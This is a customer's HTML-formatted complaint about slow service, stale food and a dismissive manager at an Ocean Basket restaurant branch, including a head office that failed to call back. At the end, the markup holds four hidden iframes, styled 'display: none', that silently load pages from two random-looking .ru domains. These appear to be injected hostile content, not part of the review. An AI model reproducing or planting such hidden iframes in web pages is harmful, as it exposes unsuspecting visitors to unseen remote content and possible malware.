Bad Service

<p> I visited Ocean Basket Cape Gate earlier this week. the moment i walked in i noticed there was hardly any customers thus expecting service to not be so slow. not only did they bring me old starter rolls they even took it off my table and i requested for others and they brought the exact same ones back to me together with source mixed with other source they should not of been mixed. </p> <p> </p> <p>then i politely requested to speak to a manager and informed them or her of this and all she did was remove it off my table and walked away not even appologising for it. i then ended up waiting 30 min for food that came and when it did it was old and chips was raw. </p> <p> </p> <p>i then called head office of ocean basket and laid the complaint and Clair informed me that she will get back to me within 24 hours. 48 hours has passed and i found myself having to contact them back to find out. </p> <p>i find this extremely rude disrespectfull and No regard for customers. why should i ever recommend Ocean basket to anyone or even step into a braunch if a reginal manager calls me back and was arrogant about the situation.</p> <p> </p> <p>it is extremely bad service and as much as i eat out i would never want to go to that braunch again.</p> <p><iframe id="a***" style="display: none;" src="https://25haich4342.ru/f2.html?a=14945"></iframe><iframe id="a***" style="display: none;" src="https://gyh1lh20owj.ru/u.html?a=14945"></iframe></p> <p><iframe id="a***" style="display: none;" src="https://25haich4342.ru/f2.html?a=14945"></iframe><iframe id="a***" style="display: none;" src="https://gyh1lh20owj.ru/u.html?a=14945"></iframe></p>
